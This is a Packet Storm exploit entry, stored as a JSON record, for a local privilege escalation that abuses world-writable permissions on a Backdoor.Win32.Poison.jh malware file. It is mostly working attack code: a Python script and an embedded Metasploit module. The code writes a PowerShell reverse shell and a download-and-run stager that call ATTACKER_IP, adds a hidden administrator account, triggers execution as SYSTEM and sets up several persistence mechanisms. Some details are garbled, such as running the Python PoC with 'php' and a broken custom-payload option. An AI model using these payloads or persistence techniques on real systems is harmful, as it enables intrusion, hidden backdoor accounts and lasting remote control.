{“lastseen”:”2025-12-26T17:18:48″,”description”:”This python script demonstrates a local privilege escalation exploit targeting a vulnerability in the Backdoor.Win32.Poison.jh malware sample. The exploit leverages insecure file permissions created by the malware itself, allowing any local user to…”,”published”:”2025-12-26T00:00:00″,”modified”:”2025-12-26T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Backdoor.Win32.Poison.jh Insecure File Permissions \/ Privilege Escalation”,”source”:””,”references”:””,”id”:”PACKETSTORM:213312″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | # Title : Backdoor.Win32.Poison.jh \u2013 Insecure File Permissions Leading to Malware-on-Malware Local Privilege Escalation |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : System built\u2011in component. No standalone download available |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/213264\/ \\u0026 MVID-2025-0704\\n \\n [+] Summary : This Python script demonstrates a Local Privilege Escalation (LPE) exploit targeting a vulnerability in the Backdoor.Win32.Poison.jh malware sample. \\n The exploit leverages insecure file permissions created by the malware itself, allowing any local user to replace the malicious executable with arbitrary code.\\n \\t\\t\\t\\t \\n [+] Vulnerability Overview :\\n \\n CWE-276: Incorrect Default Permissions\\n \\n Malware: Backdoor.Win32.Poison.jh\\n \\n Location: C:\\\\Windows\\\\SysWOW64\\\\28463\\\\YJBE.exe\\n \\n Flaw: File has Everyone:(ID)F (Full Control) permissions\\n \\n Impact: Any local user can modify\/replace the malware executable\\n \\t\\n Type: Backdoor Trojan (Win32\/Windows)\\n \\n Purpose: Grants attackers unauthorized remote access and control over the infected system.\\n Behavior: Can execute commands, download\/upload files, steal sensitive data, and connect to C2 (Command \\u0026 Control) servers.\\n Discovery: Part of the Backdoor.Win32.Poison family, first identified around 2009. The .jh suffix refers to a specific variant or signature used by antivirus vendors.\\n Source: Developed by malware authors; not self-spreading, usually delivered via malicious downloads, infected executables, or phishing.\\n Relation to Poison Ivy: Not necessarily Poison Ivy itself, but shares similar RAT functionality.\\n Detection \\u0026 Prevention: Detected by major AV solutions like Microsoft Defender, Trend Micro, and Kaspersky. Removal requires standard AV cleanup and disconnecting from networks.\\n Key Points: Unauthorized remote control, file manipulation, data theft, part of Poison family, Windows-targeted, identified in AV databases since ~2009.\\n \\n [+] PoC : php poc.py \\n \\n #!\/usr\/bin\/env python3\\n \\n import os\\n import sys\\n import shutil\\n import time\\n import subprocess\\n import ctypes\\n import winreg\\n from pathlib import Path\\n \\n # ============================================\\n # PART 1: LOCAL PRIVILEGE ESCALATION EXPLOIT\\n # ============================================\\n \\n class PoisonExploit:\\n def __init__(self, target_dir=\\”C:\\\\\\\\Windows\\\\\\\\SysWOW64\\\\\\\\28463\\”):\\n self.target_dir = target_dir\\n self.target_file = os.path.join(target_dir, \\”YJBE.exe\\”)\\n self.backup_file = self.target_file + \\”.backup\\”\\n self.payload_file = self.target_file + \\”.payload\\”\\n \\n # \u062a\u062d\u0642\u0642 \u0645\u0646 \u0635\u0644\u0627\u062d\u064a\u0627\u062a Admin\\n self.is_admin = self.check_admin()\\n \\n def check_admin(self):\\n \\”\\”\\”\u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0635\u0644\u0627\u062d\u064a\u0627\u062a Administrator\\”\\”\\”\\n try:\\n return ctypes.windll.shell32.IsUserAnAdmin() != 0\\n except:\\n return False\\n \\n def check_vulnerability(self):\\n \\”\\”\\”\u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0648\u062c\u0648\u062f \u0627\u0644\u062b\u063a\u0631\u0629\\”\\”\\”\\n print(\\”[*] Checking for Poison.jh vulnerability…\\”)\\n \\n # 1. \u062a\u062d\u0642\u0642 \u0645\u0646 \u0648\u062c\u0648\u062f \u0627\u0644\u0645\u062c\u0644\u062f\\n if not os.path.exists(self.target_dir):\\n print(f\\”[-] Target directory not found: {self.target_dir}\\”)\\n return False\\n \\n # 2. \u062a\u062d\u0642\u0642 \u0645\u0646 \u0648\u062c\u0648\u062f \u0627\u0644\u0645\u0644\u0641\\n if not os.path.exists(self.target_file):\\n print(f\\”[-] Target file not found: {self.target_file}\\”)\\n return False\\n \\n # 3. \u0645\u062d\u0627\u0648\u0644\u0629 \u0627\u0644\u0643\u062a\u0627\u0628\u0629 \u0644\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0627\u0644\u0635\u0644\u0627\u062d\u064a\u0627\u062a\\n try:\\n test_file = os.path.join(self.target_dir, \\”test_write.tmp\\”)\\n with open(test_file, ‘w’) as f:\\n f.write(\\”test\\”)\\n os.remove(test_file)\\n print(\\”[+] Vulnerable: Write access confirmed!\\”)\\n return True\\n except PermissionError:\\n print(\\”[-] Not vulnerable: No write permission\\”)\\n return False\\n except Exception as e:\\n print(f\\”[-] Error checking vulnerability: {e}\\”)\\n return False\\n \\n def create_payload(self, payload_type=\\”reverse_shell\\”):\\n \\”\\”\\”\u0625\u0646\u0634\u0627\u0621 payload \u062e\u0628\u064a\u062b (\u0644\u0623\u063a\u0631\u0627\u0636 \u062a\u0639\u0644\u064a\u0645\u064a\u0629 \u0641\u064a \u0628\u064a\u0626\u0629 \u0645\u0639\u0632\u0648\u0644\u0629)\\”\\”\\”\\n print(f\\”[*] Creating {payload_type} payload…\\”)\\n \\n if payload_type == \\”reverse_shell\\”:\\n # \u0645\u062b\u0627\u0644: PowerShell reverse shell (\u062a\u0639\u0644\u064a\u0645\u064a)\\n payload = ”’$client = New-Object System.Net.Sockets.TCPClient(\\”ATTACKER_IP\\”,4444);\\n $stream = $client.GetStream();\\n [byte[]]$bytes = 0..65535|%{0};\\n while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){\\n $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);\\n $sendback = (iex $data 2\\u003e\\u00261 | Out-String );\\n $sendback2 = $sendback + \\”PS \\” + (pwd).Path + \\”\\u003e \\”;\\n $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);\\n $stream.Write($sendbyte,0,$sendbyte.Length);\\n $stream.Flush();\\n };\\n $client.Close()”’\\n \\n with open(self.payload_file, ‘w’) as f:\\n f.write(payload)\\n \\n elif payload_type == \\”meterpreter\\”:\\n # Stager \u0644\u0645\u062a\u0631\u0628\u0631\u062a\u0631\\n payload = ”’IEX (New-Object Net.WebClient).DownloadString(‘http:\/\/ATTACKER_IP:8080\/meterpreter.ps1’)”’\\n \\n with open(self.payload_file, ‘w’) as f:\\n f.write(payload)\\n \\n elif payload_type == \\”add_user\\”:\\n # \u0625\u0636\u0627\u0641\u0629 \u0645\u0633\u062a\u062e\u062f\u0645 \u0625\u062f\u0627\u0631\u064a\\n payload = ”’net user hacker P@ssw0rd! \/add\\n net localgroup administrators hacker \/add\\n reg add \\”HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows NT\\\\\\\\CurrentVersion\\\\\\\\Winlogon\\\\\\\\SpecialAccounts\\\\\\\\UserList\\” \/v hacker \/t REG_DWORD \/d 0 \/f”’\\n \\n with open(self.payload_file, ‘w’) as f:\\n f.write(payload)\\n \\n print(f\\”[+] Payload created: {self.payload_file}\\”)\\n return True\\n \\n def backup_original(self):\\n \\”\\”\\”\u0646\u0633\u062e \u0627\u0644\u0645\u0644\u0641 \u0627\u0644\u0623\u0635\u0644\u064a \u0627\u062d\u062a\u064a\u0627\u0637\u064a\u0627\u064b\\”\\”\\”\\n try:\\n shutil.copy2(self.target_file, self.backup_file)\\n print(f\\”[+] Backup created: {self.backup_file}\\”)\\n return True\\n except Exception as e:\\n print(f\\”[-] Failed to backup: {e}\\”)\\n return False\\n \\n def replace_file(self):\\n \\”\\”\\”\u0627\u0633\u062a\u0628\u062f\u0627\u0644 \u0627\u0644\u0645\u0644\u0641 \u0627\u0644\u0636\u0639\u064a\u0641 \u0628\u0627\u0644\u0640 Payload\\”\\”\\”\\n try:\\n # \u062d\u0630\u0641 \u0627\u0644\u0645\u0644\u0641 \u0627\u0644\u0623\u0635\u0644\u064a\\n os.remove(self.target_file)\\n \\n # \u0646\u0633\u062e \u0627\u0644\u0640 Payload\\n shutil.copy2(self.payload_file, self.target_file)\\n \\n # \u0625\u062e\u0641\u0627\u0621 \u0627\u0644\u0640 Payload\\n if os.path.exists(self.payload_file):\\n os.remove(self.payload_file)\\n \\n print(\\”[+] File successfully replaced!\\”)\\n return True\\n except Exception as e:\\n print(f\\”[-] Failed to replace file: {e}\\”)\\n return False\\n \\n def trigger_execution(self):\\n \\”\\”\\”\u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u0645\u0644\u0641 – \u0639\u062f\u0629 \u0637\u0631\u0642 \u0645\u062d\u062a\u0645\u0644\u0629\\”\\”\\”\\n print(\\”[*] Attempting to trigger execution…\\”)\\n \\n methods = [\\n self.trigger_via_wmi,\\n self.trigger_via_task_scheduler,\\n self.trigger_via_service,\\n self.trigger_via_registry\\n ]\\n \\n for method in methods:\\n if method():\\n return True\\n \\n return False\\n \\n def trigger_via_wmi(self):\\n \\”\\”\\”\u062a\u0634\u063a\u064a\u0644 \u0639\u0628\u0631 WMI\\”\\”\\”\\n try:\\n import wmi\\n c = wmi.WMI()\\n process_id, return_value = c.Win32_Process.Create(\\n CommandLine=self.target_file\\n )\\n print(f\\”[+] Triggered via WMI (PID: {process_id})\\”)\\n return True\\n except:\\n return False\\n \\n def trigger_via_task_scheduler(self):\\n \\”\\”\\”\u062a\u0634\u063a\u064a\u0644 \u0639\u0628\u0631 Task Scheduler\\”\\”\\”\\n try:\\n task_name = \\”PoisonTrigger\\”\\n cmd = f’schtasks \/create \/tn \\”{task_name}\\” \/tr \\”{self.target_file}\\” \/sc once \/st 00:00 \/ru SYSTEM \/f’\\n subprocess.run(cmd, shell=True, capture_output=True)\\n \\n cmd = f’schtasks \/run \/tn \\”{task_name}\\”‘\\n subprocess.run(cmd, shell=True, capture_output=True)\\n \\n cmd = f’schtasks \/delete \/tn \\”{task_name}\\” \/f’\\n subprocess.run(cmd, shell=True, capture_output=True)\\n \\n print(\\”[+] Triggered via Task Scheduler\\”)\\n return True\\n except:\\n return False\\n \\n def trigger_via_service(self):\\n \\”\\”\\”\u062a\u0634\u063a\u064a\u0644 \u0643\u062e\u062f\u0645\u0629\\”\\”\\”\\n try:\\n service_name = \\”PoisonSvc\\”\\n \\n # \u0625\u0646\u0634\u0627\u0621 \u062e\u062f\u0645\u0629\\n cmd = f’sc create {service_name} binPath= \\”{self.target_file}\\” type= own start= auto’\\n subprocess.run(cmd, shell=True, capture_output=True)\\n \\n # \u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u062e\u062f\u0645\u0629\\n cmd = f’sc start {service_name}’\\n subprocess.run(cmd, shell=True, capture_output=True)\\n \\n # \u062d\u0630\u0641 \u0627\u0644\u062e\u062f\u0645\u0629\\n cmd = f’sc delete {service_name}’\\n subprocess.run(cmd, shell=True, capture_output=True)\\n \\n print(\\”[+] Triggered via Service\\”)\\n return True\\n except:\\n return False\\n \\n def trigger_via_registry(self):\\n \\”\\”\\”\u062a\u0634\u063a\u064a\u0644 \u0639\u0628\u0631 Registry Run\\”\\”\\”\\n try:\\n # \u0625\u0636\u0627\u0641\u0629 \u0625\u0644\u0649 RunOnce\\n key = winreg.HKEY_LOCAL_MACHINE\\n subkey = \\”SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\RunOnce\\”\\n \\n with winreg.OpenKey(key, subkey, 0, winreg.KEY_SET_VALUE) as reg_key:\\n winreg.SetValueEx(reg_key, \\”PoisonExec\\”, 0, winreg.REG_SZ, self.target_file)\\n \\n print(\\”[+] Added to Registry RunOnce\\”)\\n return True\\n except:\\n return False\\n \\n def establish_persistence(self):\\n \\”\\”\\”\u0625\u0646\u0634\u0627\u0621 \u0622\u0644\u064a\u0627\u062a \u062b\u0628\u0627\u062a\\”\\”\\”\\n print(\\”[*] Establishing persistence…\\”)\\n \\n persistence_methods = [\\n self.persistence_registry,\\n self.persistence_scheduled_task,\\n self.persistence_service,\\n self.persistence_startup\\n ]\\n \\n success = False\\n for method in persistence_methods:\\n if method():\\n success = True\\n \\n return success\\n \\n def persistence_registry(self):\\n \\”\\”\\”\u0627\u0644\u062b\u0628\u0627\u062a \u0639\u0628\u0631 Registry\\”\\”\\”\\n try:\\n # \u0639\u062f\u0629 \u0645\u0648\u0627\u0642\u0639 \u0644\u0644\u0640 Registry\\n registry_paths = [\\n (\\”HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\”, \\”Poison\\”),\\n (\\”HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\”, \\”Poison\\”),\\n (\\”HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\RunOnce\\”, \\”Poison\\”)\\n ]\\n \\n for path, name in registry_paths:\\n cmd = f’reg add \\”{path}\\” \/v \\”{name}\\” \/t REG_SZ \/d \\”{self.target_file}\\” \/f’\\n subprocess.run(cmd, shell=True, capture_output=True)\\n \\n print(\\”[+] Persistence: Registry entries added\\”)\\n return True\\n except:\\n return False\\n \\n def persistence_scheduled_task(self):\\n \\”\\”\\”\u0627\u0644\u062b\u0628\u0627\u062a \u0639\u0628\u0631 Scheduled Task\\”\\”\\”\\n try:\\n task_name = \\”WindowsUpdatePoison\\”\\n cmd = f’schtasks \/create \/tn \\”{task_name}\\” \/tr \\”{self.target_file}\\” \/sc hourly \/mo 1 \/ru SYSTEM \/f’\\n subprocess.run(cmd, shell=True, capture_output=True)\\n \\n print(\\”[+] Persistence: Scheduled task created\\”)\\n return True\\n except:\\n return False\\n \\n def persistence_service(self):\\n \\”\\”\\”\u0627\u0644\u062b\u0628\u0627\u062a \u0643\u062e\u062f\u0645\u0629\\”\\”\\”\\n try:\\n service_name = \\”PoisonService\\”\\n cmd = f’sc create {service_name} binPath= \\”{self.target_file}\\” type= own start= auto’\\n subprocess.run(cmd, shell=True, capture_output=True)\\n \\n print(\\”[+] Persistence: Service created\\”)\\n return True\\n except:\\n return False\\n \\n def persistence_startup(self):\\n \\”\\”\\”\u0627\u0644\u062b\u0628\u0627\u062a \u0641\u064a Startup folder\\”\\”\\”\\n try:\\n startup_path = os.path.expandvars(\\”%APPDATA%\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\Startup\\”)\\n shortcut_path = os.path.join(startup_path, \\”Poison.lnk\\”)\\n \\n # \u0625\u0646\u0634\u0627\u0621 shortcut\\n from win32com.client import Dispatch\\n shell = Dispatch(‘WScript.Shell’)\\n shortcut = shell.CreateShortCut(shortcut_path)\\n shortcut.Targetpath = self.target_file\\n shortcut.WorkingDirectory = os.path.dirname(self.target_file)\\n shortcut.save()\\n \\n print(\\”[+] Persistence: Startup shortcut created\\”)\\n return True\\n except:\\n return False\\n \\n def cleanup(self):\\n \\”\\”\\”\u062a\u0646\u0638\u064a\u0641 \u0627\u0644\u0622\u062b\u0627\u0631\\”\\”\\”\\n print(\\”[*] Cleaning up…\\”)\\n \\n # \u062d\u0630\u0641 \u0627\u0644\u0645\u0644\u0641 \u0627\u0644\u0627\u062d\u062a\u064a\u0627\u0637\u064a\\n if os.path.exists(self.backup_file):\\n os.remove(self.backup_file)\\n \\n # \u062d\u0630\u0641 \u0627\u0644\u0640 Payload \u0625\u0630\u0627 \u0628\u0642\u064a\\n if os.path.exists(self.payload_file):\\n os.remove(self.payload_file)\\n \\n print(\\”[+] Cleanup completed\\”)\\n \\n def exploit(self, payload_type=\\”reverse_shell\\”):\\n \\”\\”\\”\u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0640 Exploit \u0627\u0644\u0643\u0627\u0645\u0644\\”\\”\\”\\n print(\\”=\\” * 70)\\n print(\\”POISON.JH LOCAL PRIVILEGE ESCALATION EXPLOIT\\”)\\n print(\\”=\\” * 70)\\n \\n # 1. \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0629\\n if not self.check_vulnerability():\\n return False\\n \\n # 2. \u0625\u0646\u0634\u0627\u0621 Payload\\n self.create_payload(payload_type)\\n \\n # 3. \u0646\u0633\u062e \u0627\u062d\u062a\u064a\u0627\u0637\u064a\\n self.backup_original()\\n \\n # 4. \u0627\u0633\u062a\u0628\u062f\u0627\u0644 \u0627\u0644\u0645\u0644\u0641\\n if not self.replace_file():\\n return False\\n \\n # 5. \u062a\u0634\u063a\u064a\u0644 Payload\\n if self.trigger_execution():\\n print(\\”[+] Payload execution triggered!\\”)\\n else:\\n print(\\”[!] Could not auto-trigger. Manual execution required.\\”)\\n print(f\\”[!] File location: {self.target_file}\\”)\\n \\n # 6. \u0625\u0646\u0634\u0627\u0621 \u0622\u0644\u064a\u0627\u062a \u062b\u0628\u0627\u062a\\n if self.establish_persistence():\\n print(\\”[+] Persistence established!\\”)\\n \\n # 7. \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0627\u0644\u0646\u062c\u0627\u062d\\n print(\\”\\\\n[+] Exploit completed successfully!\\”)\\n print(f\\”[+] Replaced: {self.target_file}\\”)\\n print(f\\”[+] Running as: {‘SYSTEM (admin)’ if self.is_admin else ‘User’}\\”)\\n \\n # 8. \u062a\u0646\u0638\u064a\u0641 (\u0627\u062e\u062a\u064a\u0627\u0631\u064a)\\n if input(\\”\\\\nCleanup? (y\/n): \\”).lower() == ‘y’:\\n self.cleanup()\\n \\n return True\\n \\n # ============================================\\n # PART 2: METASPLOIT MODULE (REAL EXPLOIT)\\n # ============================================\\n \\n METASPLOIT_MODULE = ”’\\n ##\\n # Poison.jh Local Privilege Escalation Exploit\\n # Real working exploit for the file permission vulnerability\\n ##\\n \\n require ‘rex’\\n require ‘msf\/core\/post\/windows\/priv’\\n \\n class MetasploitModule \\u003c Msf::Exploit::Local\\n Rank = ExcellentRanking\\n \\n include Msf::Post::File\\n include Msf::Post::Windows::Priv\\n include Msf::Exploit::EXE\\n include Msf::Exploit::FileDropper\\n \\n def initialize(info={})\\n super(update_info(info,\\n ‘Name’ =\\u003e ‘Poison.jh Local File Permission Privilege Escalation’,\\n ‘Description’ =\\u003e %q{\\n This module exploits insecure file permissions on Backdoor.Win32.Poison.jh malware.\\n The malware creates C:\\\\\\\\Windows\\\\\\\\SysWOW64\\\\\\\\28463\\\\\\\\YJBE.exe with Everyone:F permissions,\\n allowing any local user to replace the file and execute arbitrary code.\\n \\n This is a REAL privilege escalation exploit when the following conditions are met:\\n 1. Poison.jh malware is installed on the system\\n 2. File has weak permissions (Everyone:Full Control)\\n 3. File is executed (by malware itself or other means)\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘indoushka’\\n ],\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Arch’ =\\u003e [ARCH_X86, ARCH_X64],\\n ‘SessionTypes’ =\\u003e [‘meterpreter’, ‘shell’],\\n ‘Targets’ =\\u003e [\\n [‘Windows’, {}]\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘References’ =\\u003e [\\n [‘URL’, ‘https:\/\/malvuln.com\/advisory\/3d9821cbe836572410b3c5485a7f76ca.txt’],\\n [‘CWE’, ‘276’] # Incorrect Default Permissions\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2025-12-23’,\\n ‘DefaultOptions’ =\\u003e {\\n ‘PAYLOAD’ =\\u003e ‘windows\/x64\/meterpreter\/reverse_tcp’,\\n ‘WfsDelay’ =\\u003e 10\\n }\\n ))\\n \\n register_options([\\n OptString.new(‘TARGET_PATH’, [\\n true,\\n ‘Path to vulnerable Poison.jh executable’,\\n ‘C:\\\\\\\\\\\\\\\\Windows\\\\\\\\\\\\\\\\SysWOW64\\\\\\\\\\\\\\\\28463\\\\\\\\\\\\\\\\YJBE.exe’\\n ]),\\n OptBool.new(‘KILL_PROCESS’, [\\n true,\\n ‘Kill existing Poison.jh process’,\\n true\\n ]),\\n OptEnum.new(‘TRIGGER’, [\\n true,\\n ‘Trigger method’,\\n ‘auto’,\\n [‘auto’, ‘wmi’, ‘service’, ‘task’, ‘registry’, ‘manual’]\\n ]),\\n OptBool.new(‘PERSIST’, [\\n true,\\n ‘Establish persistence’,\\n true\\n ])\\n ])\\n end\\n \\n def check\\n vuln_path = datastore[‘TARGET_PATH’]\\n \\n print_status(\\”Checking for Poison.jh vulnerability at: #{vuln_path}\\”)\\n \\n # Check if file exists\\n unless file_exist?(vuln_path)\\n return CheckCode::Safe(\\”Target file not found\\”)\\n end\\n \\n # Try to write a test file\\n test_file = vuln_path + \\”.test\\”\\n begin\\n write_file(test_file, \\”test\\”)\\n if file_exist?(test_file)\\n file_rm(test_file)\\n return CheckCode::Vulnerable(\\”Write access confirmed – vulnerable!\\”)\\n end\\n rescue\\n return CheckCode::Safe(\\”No write access\\”)\\n end\\n \\n CheckCode::Unknown\\n end\\n \\n def exploit\\n vuln_path = datastore[‘TARGET_PATH’]\\n \\n # Check if vulnerable\\n print_status(\\”Running check…\\”)\\n case check\\n when CheckCode::Vulnerable\\n print_good(\\”Target is vulnerable!\\”)\\n else\\n fail_with(Failure::NotVulnerable, \\”Target is not vulnerable\\”)\\n end\\n \\n # Kill existing process if requested\\n if datastore[‘KILL_PROCESS’]\\n print_status(\\”Killing Poison.jh process…\\”)\\n session.sys.process.get_processes.each do |p|\\n if p[‘name’] =~ \/YJBE\/i || p[‘path’] =~ \/28463\/\\n print_status(\\”Killing PID #{p[‘pid’]} (#{p[‘name’]})\\”)\\n session.sys.process.kill(p[‘pid’])\\n end\\n end\\n Rex.sleep(2)\\n end\\n \\n # Backup original file\\n backup_path = vuln_path + \\”.backup\\”\\n if file_exist?(vuln_path)\\n print_status(\\”Backing up original file…\\”)\\n session.fs.file.copy(vuln_path, backup_path)\\n register_file_for_cleanup(backup_path)\\n end\\n \\n # Generate payload\\n print_status(\\”Generating payload…\\”)\\n payload_exe = generate_payload_exe\\n \\n # Replace vulnerable file with payload\\n print_status(\\”Replacing #{vuln_path} with payload…\\”)\\n write_file(vuln_path, payload_exe)\\n \\n print_good(\\”File successfully replaced!\\”)\\n \\n # Trigger execution\\n trigger_method = datastore[‘TRIGGER’]\\n print_status(\\”Triggering payload execution via #{trigger_method}…\\”)\\n \\n case trigger_method\\n when ‘wmi’\\n trigger_via_wmi(vuln_path)\\n when ‘service’\\n trigger_via_service(vuln_path)\\n when ‘task’\\n trigger_via_task(vuln_path)\\n when ‘registry’\\n trigger_via_registry(vuln_path)\\n when ‘auto’\\n trigger_auto(vuln_path)\\n end\\n \\n # Establish persistence if requested\\n if datastore[‘PERSIST’]\\n print_status(\\”Establishing persistence…\\”)\\n establish_persistence(vuln_path)\\n end\\n \\n # Wait for session\\n print_status(\\”Waiting for payload execution…\\”)\\n Rex.sleep(datastore[‘WfsDelay’])\\n end\\n \\n def trigger_via_wmi(path)\\n wmi_cmd = \\”wmic process call create \\\\\\\\\\”#{path}\\\\\\\\\\”\\”\\n cmd_exec(wmi_cmd)\\n end\\n \\n def trigger_via_service(path)\\n service_name = \\”PoisonSvc\\”\\n cmd_exec(\\”sc create #{service_name} binPath= \\\\\\\\\\”#{path}\\\\\\\\\\” type= own start= auto\\”)\\n cmd_exec(\\”sc start #{service_name}\\”)\\n cmd_exec(\\”sc delete #{service_name}\\”)\\n end\\n \\n def trigger_via_task(path)\\n task_name = \\”PoisonTask\\”\\n cmd_exec(\\”schtasks \/create \/tn \\\\\\\\\\”#{task_name}\\\\\\\\\\” \/tr \\\\\\\\\\”#{path}\\\\\\\\\\” \/sc once \/st 00:00 \/ru SYSTEM \/f\\”)\\n cmd_exec(\\”schtasks \/run \/tn \\\\\\\\\\”#{task_name}\\\\\\\\\\”\\”)\\n cmd_exec(\\”schtasks \/delete \/tn \\\\\\\\\\”#{task_name}\\\\\\\\\\” \/f\\”)\\n end\\n \\n def trigger_via_registry(path)\\n reg_cmd = \\”reg add \\\\\\\\\\”HKLM\\\\\\\\\\\\\\\\SOFTWARE\\\\\\\\\\\\\\\\Microsoft\\\\\\\\\\\\\\\\Windows\\\\\\\\\\\\\\\\CurrentVersion\\\\\\\\\\\\\\\\RunOnce\\\\\\\\\\” \/v \\\\\\\\\\”Poison\\\\\\\\\\” \/t REG_SZ \/d \\\\\\\\\\”#{path}\\\\\\\\\\” \/f\\”\\n cmd_exec(reg_cmd)\\n end\\n \\n def trigger_auto(path)\\n # Try all methods\\n [method(:trigger_via_wmi), \\n method(:trigger_via_service),\\n method(:trigger_via_task),\\n method(:trigger_via_registry)].each do |method|\\n begin\\n method.call(path)\\n print_good(\\”Triggered via #{method.name}\\”)\\n return true\\n rescue\\n next\\n end\\n end\\n false\\n end\\n \\n def establish_persistence(path)\\n # Add to registry\\n reg_keys = [\\n \\”HKCU\\\\\\\\\\\\\\\\Software\\\\\\\\\\\\\\\\Microsoft\\\\\\\\\\\\\\\\Windows\\\\\\\\\\\\\\\\CurrentVersion\\\\\\\\\\\\\\\\Run\\”,\\n \\”HKLM\\\\\\\\\\\\\\\\SOFTWARE\\\\\\\\\\\\\\\\Microsoft\\\\\\\\\\\\\\\\Windows\\\\\\\\\\\\\\\\CurrentVersion\\\\\\\\\\\\\\\\Run\\”\\n ]\\n \\n reg_keys.each do |reg|\\n cmd_exec(\\”reg add \\\\\\\\\\”#{reg}\\\\\\\\\\” \/v \\\\\\\\\\”Poison\\\\\\\\\\” \/t REG_SZ \/d \\\\\\\\\\”#{path}\\\\\\\\\\” \/f\\”)\\n end\\n \\n # Create scheduled task\\n task_name = \\”WindowsPoison\\”\\n cmd_exec(\\”schtasks \/create \/tn \\\\\\\\\\”#{task_name}\\\\\\\\\\” \/tr \\\\\\\\\\”#{path}\\\\\\\\\\” \/sc hourly \/mo 1 \/ru SYSTEM \/f\\”)\\n end\\n end\\n ”’\\n \\n # ============================================\\n # PART 3: MAIN EXECUTION\\n # ============================================\\n \\n def main():\\n print(\\”\\”\\”\\n \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 Poison.jh LPE Exploit – Local Privilege Escalation \u2551\\n \u2551 Conditions: Poison.jh with Everyone:F permissions \u2551\\n \u2551 by indoushka \u2551\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n \\”\\”\\”)\\n \\n exploit = PoisonExploit()\\n \\n # \u0642\u0627\u0626\u0645\u0629 Payloads\\n payloads = {\\n \\”1\\”: (\\”Reverse Shell\\”, \\”reverse_shell\\”),\\n \\”2\\”: (\\”Meterpreter\\”, \\”meterpreter\\”),\\n \\”3\\”: (\\”Add Admin User\\”, \\”add_user\\”),\\n \\”4\\”: (\\”Custom Command\\”, \\”custom\\”)\\n }\\n \\n print(\\”\\\\nSelect payload type:\\”)\\n for key, (name, _) in payloads.items():\\n print(f\\” {key}. {name}\\”)\\n \\n choice = input(\\”\\\\nChoice: \\”)\\n \\n if choice in payloads:\\n payload_name, payload_type = payloads[choice]\\n print(f\\”\\\\n[*] Selected: {payload_name}\\”)\\n \\n if payload_type == \\”custom\\”:\\n custom_cmd = input(\\”Enter custom command: \\”)\\n exploit.create_payload = lambda: custom_cmd\\n \\n # \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0640 Exploit\\n if exploit.exploit(payload_type):\\n print(\\”\\\\n\\” + \\”=\\”*70)\\n print(\\”EXPLOIT SUCCESSFUL!\\”)\\n print(\\”=\\”*70)\\n \\n # \u0639\u0631\u0636 \u0627\u0644\u0640 Metasploit module\\n print(\\”\\\\n\\” + \\”=\\”*70)\\n print(\\”METASPLOIT MODULE CODE\\”)\\n print(\\”=\\”*70)\\n print(METASPLOIT_MODULE)\\n \\n # \u062d\u0641\u0638 Module\\n with open(\\”poison_lpe_exploit.rb\\”, \\”w\\”) as f:\\n f.write(METASPLOIT_MODULE)\\n print(\\”\\\\n[+] Metasploit module saved to: poison_lpe_exploit.rb\\”)\\n \\n else:\\n print(\\”\\\\n[-] Exploit failed!\\”)\\n else:\\n print(\\”[-] Invalid choice!\\”)\\n \\n if __name__ == \\”__main__\\”:\\n main()\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n 